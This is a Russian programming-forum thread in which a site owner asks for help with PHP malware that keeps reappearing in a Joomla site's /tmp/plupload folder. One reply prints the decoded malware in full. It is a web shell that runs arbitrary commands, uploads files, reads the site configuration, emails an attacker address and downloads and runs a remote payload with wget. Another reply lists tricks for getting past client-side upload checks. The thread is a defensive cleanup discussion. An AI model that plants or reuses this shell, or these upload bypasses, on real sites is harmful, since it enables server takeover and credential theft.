Форум программистов, компьютерный форум, киберфорум
Безопасность сайтов и серверов
Войти
Регистрация
Восстановить пароль
Карта форума Темы раздела Блоги Сообщество Поиск Заказать работу  
 
Рейтинг 4.88/8: Рейтинг темы: голосов - 8, средняя оценка - 4.88
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
1

Вирус на сайте в /tmp/plupload

26.07.2015, 17:07. Показов 1653. Ответов 17
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
Добрый день.
На моем сайте постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
Кто может что-то посоветовать.
Файлы постоянно удаляю но через время появляются.
Хостинг выдает сообщения что на сайте вирус.
Сайт http://www.corporationdp.net

Во вложении одни из файлов которые обнаружил антивирус plupload.zip

P.S. извините если не туда обращаюсь. Очень нужна помощь.
Вложения
Тип файла: zip plupload.zip (31.9 Кб, 7 просмотров)
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
26.07.2015, 17:07
Ответы с готовыми решениями:

Безопасно ли доверять загрузчику plupload?
Всем привет. В данном загрузчике(если кто с ним знаком) есть 2 вида загрузки файла. 1. Полная...

Вирус на сайте?
Здравствуйте! Помогите убрать вирус с моего сайта. После редактирования страниц у меня появилась на...

Вирус на сайте
Нашел вирус на сайте.не могу найти где он сидит. сайт maksfer.ru вирус на главной странице...

Вирус на сайте!
Доброго дня! Помогите, подскажите, народ честной! Не так давно схватил на сайт (word.ts6.ru) вирус...

17
669 / 640 / 335
Регистрация: 26.04.2014
Сообщений: 2,122
26.07.2015, 18:50 2
Цитата Сообщение от VlaDOS81 Посмотреть сообщение
На моем сайте постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
1. Вот расшифрованый код скрипта:
Decoded Output
PHP/HTML
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
<?php if (!isset($_SESSION['bajak'])) {
    $visitcount = 0;
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $body = "ada yang inject 
$web$inj";
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = "SAFE_MODE = OFF";
    } else {
        $security = "SAFE_MODE = ON";
    };
    $serper = gethostbyname($_SERVER['SERVER_ADDR']);
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
    mail("ariganex8@gmail.com
/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */", "$body", "Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
    $_SESSION['bajak'] = 0;
} else {
    $_SESSION['bajak']++;
};
if (isset($_GET['clone'])) {
    $source = $_SERVER['SCRIPT_FILENAME'];
    $desti = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/SimplePie/404.phpp";
    rename($source, $desti);
}
if (isset($_GET['viar'])) {
    system("wget http://hftcommunications.com/components/com_xmap/com_xmap.zip;unzip com_xmap.zip");
}
if (isset($_GET['botnet'])) {
    system("cd com_xmap.zip;perl com_xmap.txt");
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
    $security = "SAFE_MODE : OFF";
} else {
    $security = "SAFE_MODE : ON";
}
echo "<title>Arhy - Shell</title><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
function pwd() {
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        };
    } elseif ($u = strrpos($cwd, '\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo ' < formmethod = "POST"action = "" > < fontsize = 2color = #888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
    echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
    if (isset($_POST['submit'])) {
        $uploaddir = pwd();
        if (!$name = $_POST['newname']) {
            $name = $_FILES['userfile']['name'];
        };
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
            echo "Upload Failed";
        } else {
            echo "Upload Success to " . $uploaddir . $name . " :P ";
        }
    }
    if (isset($_POST['command'])) {
        $cmd = $_POST['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
    } elseif (isset($_GET['cmd'])) {
        $comd = $_GET['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
    } elseif (isset($_GET['rf'])) {
        $rf = file_get_contents("../../../../../configuration.php");
        echo $rf;
    } else {
        echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
    }


2. Возможно у вас на сайте есть форма для загрузки файлов (например картинок).
Если такая форма для загрузки файлов есть, то надо очень строго фильтровать загружаемые файлы по типу, содержимому и расширению. Если что-то не так, то не разрешать загрузку такого файла.
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
26.07.2015, 21:53  [ТС] 3
У меня на сайте используется Adsmanager 2.7.0 Stable там действительно есть форма для загрузки картинок и там когда пробуешь загрузить какой либо иной фал не картинку то не дает как при перетаскивании так и при выборе файла.
Я сам тестировал несколько раз.

А вот код смотрю ссылается на компонент com_xmap я вот думаю может его вообще отключить или удалить.
Не пойму где дырка в сайте....
0
669 / 640 / 335
Регистрация: 26.04.2014
Сообщений: 2,122
26.07.2015, 22:11 4
Цитата Сообщение от VlaDOS81 Посмотреть сообщение
и там когда пробуешь загрузить какой либо иной фал не картинку то не дает как при перетаскивании так и при выборе файла.
А вы через сниффер запрос подмените, я думаю результат будет положительный.
Или связанные события через консоль браузера javascript элементы отключить... Вот я думаю получится.
Проверка типа файла должна быть на сервере.

Добавлено через 1 минуту
Или добавьте несколько байтов от картинки, а далее ваш файлик.
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
26.07.2015, 22:41  [ТС] 5
я не совсем разбираюсь в том что вы мне посоветовали но на хостинге мне ответили так:
Данное ограничение Вы можете настроить средствами Вашей CMS
В настройках хостинга данная возможность не реализована

теперь вопрос где это в Joomla 2.5.9 можно настроить?
0
Почетный модератор
12271 / 5336 / 268
Регистрация: 05.04.2011
Сообщений: 14,086
Записей в блоге: 2
27.07.2015, 00:04 6
VlaDOS81, Вам нужно не настройкой движка заниматься, а искать каким образом заливают эти файлы. Зуб даю - на хостинге у вас есть бэкдор.

Прогоните сайт манулом и посмотрите что он скажет.
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
27.07.2015, 00:53  [ТС] 7
Спасибо за совет. Вот что получилось... в архиве scan_log.xml.zip
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
28.07.2015, 10:20  [ТС] 8
Короче манул нашел залитые файлы и отметил как вирус красным и еще около 300 желтым и все

Добавлено через 12 минут
попробовал запустить фал из сайта
http://www.corporationdp.net/tmp/plupload/mil.php

получается что таким образом можно залить любой файл
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
28.07.2015, 10:29  [ТС] 9
вот скрин
Миниатюры
Вирус на сайте в /tmp/plupload  
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
28.07.2015, 10:37  [ТС] 10
вот ссылка на архив https://yadi.sk/d/Kc8q4gSgi8MYj
0
Почетный модератор
12271 / 5336 / 268
Регистрация: 05.04.2011
Сообщений: 14,086
Записей в блоге: 2
29.07.2015, 17:43 11
VlaDOS81, Вы зря выкладываете архив в общий доступ. В нем находится информация, критичная для безопасности Вашего сайта.

Просто глянуть тут не получится - это нужно сидеть и работать. Если сами не знаете что делать с логами - ищите спецов, которые знают. Там не на один час, а, может, и день, работы.
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
30.07.2015, 10:49  [ТС] 12
архив удалил

Добавлено через 16 часов 51 минуту
как думаете, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это?
0
Почетный модератор
12271 / 5336 / 268
Регистрация: 05.04.2011
Сообщений: 14,086
Записей в блоге: 2
30.07.2015, 11:26 13
VlaDOS81, тогда сайт работать не будет)
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
30.07.2015, 11:28  [ТС] 14
я так сделал на залитые файлы а tmp = 700
вроде все работатет
0
Почетный модератор
12271 / 5336 / 268
Регистрация: 05.04.2011
Сообщений: 14,086
Записей в блоге: 2
30.07.2015, 12:49 15
VlaDOS81,если вирус УЖЕ прописан в файлах - с этого никакого толку не будет.
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
31.07.2015, 13:54  [ТС] 16
вот нашел тему по своему вопросу https://revisium.com/ru/blog/adsmanager_afu.html
0
Почетный модератор
12271 / 5336 / 268
Регистрация: 05.04.2011
Сообщений: 14,086
Записей в блоге: 2
31.07.2015, 14:02 17
VlaDOS81, если у Вашего хостера нет бэков без вируса - обратитесь в Ревизиум для платной помощи. Они сделают как надо.

Если есть - развернуть бэк и немедленно выполнить все рекомендации по адресу, который Вы привели.
0
0 / 0 / 0
Регистрация: 26.07.2015
Сообщений: 11
31.07.2015, 14:09  [ТС] 18
На моем хосте лечением занимаются только сами клиенты.
Думаю поставить еще на сайт RSFirewall, что скажете?
0
31.07.2015, 14:09
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
31.07.2015, 14:09
Помогаю со студенческими работами здесь

Вирус на сайте (джумла)
Доброго времени суток! Помогите пожалуйста разобраться с вирусом! движок Джумла По пути мой...

Появился вирус на сайте
Здравствуйте. На моем сайте появился вирус, в нижнем левом углу появляется всплывающее окно с лже...

Касперский находит вирус на сайте
Здравствуйте! Недавно мне отказала в обслуживание биржа ссылок GoGetLinks, всвязи с тем что ее...

Вирус на сайте - не работает редактор Tiny MCE
При работе в редакторе Тини стал добавляться лишний код, который сначала просто увеличивал размер...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
18
Ответ Создать тему
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru